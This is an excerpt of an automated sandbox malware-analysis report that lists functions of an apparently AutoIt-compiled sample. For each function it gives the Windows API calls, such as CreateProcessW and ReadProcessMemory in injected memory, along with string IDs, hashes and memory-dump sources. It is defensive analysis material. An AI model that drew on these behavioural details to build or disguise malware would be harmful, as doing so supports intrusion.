                                                                      • Instruction ID: 806fa79cd8fadffe371e95eaee117b274694158504e1a5519fda6ae4af080b0d
                                                                      • Opcode Fuzzy Hash: 27830cf8d18001f4028d5a76c9b6e9515578cf62467896d70aac20cf7f36ceed
                                                                      • Instruction Fuzzy Hash: 65F0FC3490020DF7CF10BA64DC86EAD77EC9E00710B6045F9B924D5591EF71DB5AC6D0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C13017 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetTempPathW.KERNEL32(00000104,?), ref: 00C1302F
                                                                      • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00C13044
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Temp$FileNamePath
                                                                      • String ID: aut
                                                                      • API String ID: 3285503233-3010740371
                                                                      • Opcode ID: a3bc9d102db2f1da93c4cd97f8cbb5a34591bb6ac25c66c52ef82d6adf212780
                                                                      • Instruction ID: 5a07b95d4f2a66afda7ab29d3332e4e06308f160628ce0ec83b9cd509334dc80
                                                                      • Opcode Fuzzy Hash: a3bc9d102db2f1da93c4cd97f8cbb5a34591bb6ac25c66c52ef82d6adf212780
                                                                      • Instruction Fuzzy Hash: 5AD05EB250032867DA30A7A4AC8EFCF3A6CDB04750F0002A1BA55E2091DAB59984CBD0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00111300 Relevance: 5.2, APIs: 3, Instructions: 720processCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CreateProcessW.KERNEL32(?,00000000), ref: 00111B2D
                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00111B73
                                                                      • TerminateProcess.KERNELBASE(00000000,00000000,?), ref: 00111E7C
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457787818.0000000000110000.00000040.00001000.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_110000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Process$CreateMemoryReadTerminate
                                                                      • String ID:
                                                                      • API String ID: 2831168122-0
                                                                      • Opcode ID: a08d661af1579fd21ac3dcfb20f4bf99dc511b72db546338f3390fc10d84f6f3
                                                                      • Instruction ID: c47929bd4a5fdbd7679c423b1e546ca03c30c6deeeb756ccc637657a4ef3ef80
                                                                      • Opcode Fuzzy Hash: a08d661af1579fd21ac3dcfb20f4bf99dc511b72db546338f3390fc10d84f6f3
                                                                      • Instruction Fuzzy Hash: AF62F930A14258DBEB28CFA4C851BDEB376EF58300F1091A9D60DEB394E7759E81CB59
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C27F59 Relevance: 4.9, APIs: 3, Instructions: 430COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00C282F5
                                                                      • TerminateProcess.KERNEL32(00000000), ref: 00C282FC
                                                                      • FreeLibrary.KERNEL32(?,?,?,?), ref: 00C284DD
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Process$CurrentFreeLibraryTerminate
                                                                      • String ID:
                                                                      • API String ID: 146820519-0
                                                                      • Opcode ID: 13beab4a3d7b9b8e142ddbb8c422d257ed677be11b415484661607592e980648
                                                                      • Instruction ID: f7ed40220d91022090ce5a1f1b738f169c89b3ced2a2b4a2d71399bc9ab508ed
                                                                      • Opcode Fuzzy Hash: 13beab4a3d7b9b8e142ddbb8c422d257ed677be11b415484661607592e980648
                                                                      • Instruction Fuzzy Hash: 70127C719083119FD714DF28D484B6ABBE1FF89318F04895DE8998B252CB31ED49CF92
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00BD5AA9 Relevance: 4.7, APIs: 3, Instructions: 186COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 73721f3aa7ede0b81baf5642a6bae919def0cdee38a1aef1e1adabd1536ba49f
                                                                      • Instruction ID: f7c454ec3ceb878cd7bd132df6b981b8d80bc70cd255905d1f68cf0b3bfeaa11
                                                                      • Opcode Fuzzy Hash: 73721f3aa7ede0b81baf5642a6bae919def0cdee38a1aef1e1adabd1536ba49f
                                                                      • Instruction Fuzzy Hash: 17517D7191060AABDB319FA8C885FAEFBF8EF45310F1800DBF405AB391E6719941DB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00BA54C6 Relevance: 4.6, APIs: 3, Instructions: 103COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000001), ref: 00BA556D
                                                                      • SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001), ref: 00BA557D
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: FilePointer
                                                                      • String ID:
                                                                      • API String ID: 973152223-0
                                                                      • Opcode ID: 5e0fbbf403e02154aba11aace2cd734b236cb9634d27b3b687f428999d72bb8a
                                                                      • Instruction ID: 33d72ecd36dcd5358663fbbe29fe6ff29523ed6510b5d883d4abda104001fc3a
                                                                      • Opcode Fuzzy Hash: 5e0fbbf403e02154aba11aace2cd734b236cb9634d27b3b687f428999d72bb8a
                                                                      • Instruction Fuzzy Hash: 59316C71A04A09EFDB24CF68C881B9DB7F6FB48714F14826AE91997240D771FE94CB90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C12FD8 Relevance: 4.5, APIs: 3, Instructions: 27filetimeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000), ref: 00C12FF2
                                                                      • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00C12CD4,?,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00C13006
                                                                      • CloseHandle.KERNEL32(00000000), ref: 00C1300D
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: File$CloseCreateHandleTime
                                                                      • String ID:
                                                                      • API String ID: 3397143404-0
                                                                      • Opcode ID: fbcc368de16dc81a2d79be1a2fce99e801a517c56b8c789be36b779e882960ff
                                                                      • Instruction ID: 68da2fbcbd2aab7459757291cd615752c7d2aa9bd922b47d1376cb45d29b52d4
                                                                      • Opcode Fuzzy Hash: fbcc368de16dc81a2d79be1a2fce99e801a517c56b8c789be36b779e882960ff
                                                                      • Instruction Fuzzy Hash: 61E0863229021077D6301755BC4DFCF3A5CD78AB75F104210F729750D046A0560163A8
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00BB1310 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 531COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __Init_thread_footer.LIBCMT ref: 00BB17F6
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Init_thread_footer
                                                                      • String ID: CALL
                                                                      • API String ID: 1385522511-4196123274
                                                                      • Opcode ID: d283efd980ac046cb429d0ebbda818f045ecdf590454abc7b986bbed2f4301fc
                                                                      • Instruction ID: d2206001ee52aeda8c9ccada2d0c0104b1bd0ebb2f710cbc4ac630587cf6ad56
                                                                      • Opcode Fuzzy Hash: d283efd980ac046cb429d0ebbda818f045ecdf590454abc7b986bbed2f4301fc
                                                                      • Instruction Fuzzy Hash: 36228B706082019FC714DF18C8A0ABABBF1FF95314F5489ADF9968B361D7B1E845CB92
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C16EF1 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 297COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • _wcslen.LIBCMT ref: 00C16F6B
                                                                        • Part of subcall function 00BA4ECB: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00C71418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00BA4EFD
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: LibraryLoad_wcslen
                                                                      • String ID: >>>AUTOIT SCRIPT<<<
                                                                      • API String ID: 3312870042-2806939583
                                                                      • Opcode ID: 9e313aedbf13bd1e7d1e1f4d8947b3022c2a119bfc969c1e85ff395aeefdcd8b
                                                                      • Instruction ID: e1acfa9cd035f1a4253efcd85755e9f7ca2fa85a82bb7cba61cdba06d6f69971
                                                                      • Opcode Fuzzy Hash: 9e313aedbf13bd1e7d1e1f4d8947b3022c2a119bfc969c1e85ff395aeefdcd8b
                                                                      • Instruction Fuzzy Hash: B3B1743150C3019FCB14EF24C4919AEB7E5AF96310F14899DF496972A2DF30EE89DB92
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00BDC827 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Info
                                                                      • String ID:
                                                                      • API String ID: 1807457897-3916222277
                                                                      • Opcode ID: ecb9b4a69119c11a387ecb457997e7e7c8717392e88e74a5eca29de57f12d38d
                                                                      • Instruction ID: 352c7a953d1e308001acc1475b64588281833be16186d5e535e901435eee5bf0
                                                                      • Opcode Fuzzy Hash: ecb9b4a69119c11a387ecb457997e7e7c8717392e88e74a5eca29de57f12d38d
                                                                      • Instruction Fuzzy Hash: AC412B705043499ADF268E64CC94BFAFFE9EF45304F2404EEE58A87242E6399A45DF60
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00BA2DE3 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetOpenFileNameW.COMDLG32(?), ref: 00BE2C8C
                                                                        • Part of subcall function 00BA3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00BA3A97,?,?,00BA2E7F,?,?,?,00000000), ref: 00BA3AC2
                                                                        • Part of subcall function 00BA2DA5: GetLongPathNameW.KERNELBASE ref: 00BA2DC4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Name$Path$FileFullLongOpen
                                                                      • String ID: X
                                                                      • API String ID: 779396738-3081909835
                                                                      • Opcode ID: 95a48a941a9b44382e9f4d7cc5b3478d86dab1a11104650d8ae828deadec7314
                                                                      • Instruction ID: 25e8497650a6088b0e23833026a7cea828c51614985f02fd09bd3e5fbf24a12f
                                                                      • Opcode Fuzzy Hash: 95a48a941a9b44382e9f4d7cc5b3478d86dab1a11104650d8ae828deadec7314
                                                                      • Instruction Fuzzy Hash: 8921C371A04298AFDF01DF98C845BEE7BFCAF49304F004099E405A7241DFB45A898BA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C12557 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: __fread_nolock
                                                                      • String ID: EA06
                                                                      • API String ID: 2638373210-3962188686
                                                                      • Opcode ID: 1ec30852932a1909770c0ca27b73835e75e20b0935543a353e0c1e9596c84ddc
                                                                      • Instruction ID: fbc3b2428c30e001e9f92e21b891a5e0a9f9b0a937c4beffd151a606c6eabf56
                                                                      • Opcode Fuzzy Hash: 1ec30852932a1909770c0ca27b73835e75e20b0935543a353e0c1e9596c84ddc
                                                                      • Instruction Fuzzy Hash: 0101B172944258BEDF28C7A8C856FEEBBF8DB05301F00459EE1A2D21C1E5B4E718DB60
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00BD3467 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • LCMapStringW.KERNEL32(00000000,00000001,00000000,00000000,00000001,?,?,?,00000001,00000000,00000001,?,?,?,?,?), ref: 00BD34D8
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: String
                                                                      • String ID: LCMapStringEx
                                                                      • API String ID: 2568140703-3893581201
                                                                      • Opcode ID: cebac088348e002bb60b7fbae5c79bd15c03a3de42b865c40294164ac7947ae0
                                                                      • Instruction ID: 8e5f4a3050298dbf4a4f9d9cdbe5a6f28b2ed3404e8ca16a524b21b588509279
                                                                      • Opcode Fuzzy Hash: cebac088348e002bb60b7fbae5c79bd15c03a3de42b865c40294164ac7947ae0
                                                                      • Instruction Fuzzy Hash: B401133260020CBBCF125F91DD02EEE7FA6EF08750F044195FE0826271D63A8A31AB91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00112390 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 46processCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 001123EA
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457787818.0000000000110000.00000040.00001000.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_110000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: CreateProcess
                                                                      • String ID: D
                                                                      • API String ID: 963392458-2746444292
                                                                      • Opcode ID: c44042240367ae80eaa8206569f06584b606a7a7c9118113533914ad92b6354f
                                                                      • Instruction ID: ac445f03561a58773acaa1db9152c7ed127af4318bad4ce3d8486ae01bad572b
                                                                      • Opcode Fuzzy Hash: c44042240367ae80eaa8206569f06584b606a7a7c9118113533914ad92b6354f
                                                                      • Instruction Fuzzy Hash: 3001FF71500308ABDB28DFE0CC49FEE7778BB44701F508519FA159A180EB78A698CB56
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00BD3162 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Alloc
                                                                      • String ID: FlsAlloc
                                                                      • API String ID: 2773662609-671089009
                                                                      • Opcode ID: 91ea33f34b16c35828182a077b736df7837c976d5e09ad0106fc6f2087eff8f1
                                                                      • Instruction ID: b439f3aa6e4461f047c4b56cf50355d3109fd3f7c3412c14497ff2d0124e62df
                                                                      • Opcode Fuzzy Hash: 91ea33f34b16c35828182a077b736df7837c976d5e09ad0106fc6f2087eff8f1
                                                                      • Instruction Fuzzy Hash: 48E0E531744318B797206BA09C47F6DBBD4EF54B21B4001AAFD0567351E9B05F0196DA
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00BC3600 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • try_get_function.LIBVCRUNTIME ref: 00BC3615
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: try_get_function
                                                                      • String ID: FlsAlloc
                                                                      • API String ID: 2742660187-671089009
                                                                      • Opcode ID: 3207f6c981d7880c9fcfd17f8e9d0732a33f1fb5c7d40eb67883ac8592685e54
                                                                      • Instruction ID: 3f7b77c6ae9abb660c879f6a2674528e3af1d3da0ba3ed8241f05668d00dd619
                                                                      • Opcode Fuzzy Hash: 3207f6c981d7880c9fcfd17f8e9d0732a33f1fb5c7d40eb67883ac8592685e54
                                                                      • Instruction Fuzzy Hash: 41D01232A9972467C6502AD4AD06FADBBC4DB05FA2F4444B5FD086529195518A1146C1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00BDCB7C Relevance: 3.2, APIs: 2, Instructions: 168COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00BDC74F: GetOEMCP.KERNEL32(00000000), ref: 00BDC77A
                                                                      • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00BDCA1D,?,00000000), ref: 00BDCBF0
                                                                      • GetCPInfo.KERNEL32(00000000,00BDCA1D,?,?,?,00BDCA1D,?,00000000), ref: 00BDCC03
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: CodeInfoPageValid
                                                                      • String ID:
                                                                      • API String ID: 546120528-0
